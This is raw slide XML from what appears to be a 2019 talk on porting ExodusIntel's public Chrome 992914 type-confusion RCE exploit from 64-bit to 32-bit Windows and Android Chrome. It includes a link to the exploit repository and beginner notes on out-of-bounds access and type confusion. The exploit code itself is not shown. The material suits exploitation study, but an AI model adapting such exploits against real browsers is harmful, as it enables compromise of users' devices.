          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8411507" y="5009799"/>
            <a:ext cx="1390105" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>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exodusintel’s github</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53" name="직사각형 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AADAE7E-03CF-4401-84C2-E40F4524D2AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459317" y="5726551"/>
            <a:ext cx="10339026" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://github.com/exodusintel/Chrome-Issue-992914-Sealed-Frozen-Element-Kind-Type-Confusion-RCE-Exploit/tree/master/chrome_992914</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="직사각형 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E678E666-D490-498C-85E6-4A570316FF7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150278" y="6003894"/>
            <a:ext cx="7170938" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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The calculator PoC worked very well and had the best reliability.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="슬라이드 번호 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81F1C54D-0538-4744-A6EF-EFC4D08A9B04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="날짜 개체 틀 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EFE8C61-5BA1-4094-8707-B40F90ABA13C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{600273C0-CB43-4BC7-8323-BCE183F1A0CC}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3354967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962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="3677315"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So what do I want to do?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRP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7" y="866181"/>
            <a:ext cx="11893334" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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I assume you already know the technology for OOB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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PoC code released by ExodusIntel only works on 64-bit Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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I need to make this code work on 32-bit windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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If it works on 32-bit Windows, it also works on Android Chrome Browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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Android Chrome Browser is in 32-bit mode. (OOB code is compatible on 32-bit Windows and Mobile.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="그림 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C4B24D-42CC-4F4A-BB2A-32AD0A520301}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="402735" y="2273841"/>
            <a:ext cx="3697692" cy="4276268"/>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6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFAD74FE-81A2-4ADB-A383-3497150D6744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4100427" y="2249650"/>
            <a:ext cx="8091573" cy="1785104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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How can I convert exploit code from 64-bit to 32-bit?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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Is there a need to fully understand the content of the vulnerability?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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In simple terms, you will probably not need to understand the vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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The funny thing is that I thought so too.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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However, at the end of the exploit converting, you will eventually understand the vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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Of course, it is much better for you to read the original exploit researcher's explanation to understand the fundamentals.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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You can't avoid debugging in the process of converting from 64-bit to 32-bit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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The process improves your understanding of the exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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This experience is a much better way of studying than simply reading and analyzing 64-bit exploits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I would recommend this study method to hackers who start hacking a browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="직사각형 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A70087D9-D91F-4C84-A1DE-D31466556383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2129149" y="4285017"/>
            <a:ext cx="1900989" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>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Original 64-bit Exploit Code</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1050">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="그룹 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{530E68CB-6EFF-4DBE-81B0-0F986FAE4F43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6919947" y="4616479"/>
            <a:ext cx="2452531" cy="2067563"/>
            <a:chOff x="6919948" y="4616479"/>
            <a:chExt cx="2452531" cy="2067563"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF8E3384-B0FC-441D-B9D4-37443F84A718}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6919948" y="5967329"/>
              <a:ext cx="2452531" cy="307777"/>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ltLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Do you wanna play a game?</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="그룹 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E67A626-D441-4918-9CEE-FCB31FFB48BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7167630" y="4616479"/>
              <a:ext cx="1957161" cy="1249691"/>
              <a:chOff x="7167633" y="4504779"/>
              <a:chExt cx="1957161" cy="1249691"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="10" name="그림 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{982B1A87-5EF1-4CF2-B5BC-56BE9B9842EA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7167633" y="4504779"/>
                <a:ext cx="1957161" cy="1249691"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:softEdge rad="112500"/>
              </a:effectLst>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="11" name="그림 10" descr="동물이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EA9FD2E-B407-456E-B784-FDE76E4D7C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7590" y="4605938"/>
                <a:ext cx="1417247" cy="523686"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:effectLst>
                <a:glow rad="139700">
                  <a:srgbClr val="4B8293">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:glow>
              </a:effectLst>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE3ADC1-94CC-4161-85A7-6A712740DC78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7669031" y="6376265"/>
              <a:ext cx="954364" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Yes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="92D050"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>or</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="92D050"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>No</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF2B7A50-9927-4656-883B-E247275FBB18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289257" y="4094784"/>
            <a:ext cx="6490202" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="38100"/>
          </a:effectLst>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ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The code on the left is the core code of ExodusIntel's original exploit code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You'll get stuck(hang) when you run this exploit code in a 32-bit Windows Chrome Browser.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="슬라이드 번호 개체 틀 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA47BA18-58C4-43CB-BDD8-51805C8D6344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="날짜 개체 틀 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6934BFE0-DF89-45B2-AA83-9BA16138EF87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3820630-9AEE-416B-AE00-0679E08EDCE0}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319977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962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="7587579"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What is OOB? A beginner's guide to browser hacking!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRP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7" y="866181"/>
            <a:ext cx="11881302" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-K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OOB synonym for "Out Of Bound".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-K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OOB is the ultimate goal of hackers who attack JavaScript for browser hacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-K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To get OOB, a technique called "TypeConfusion" is used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
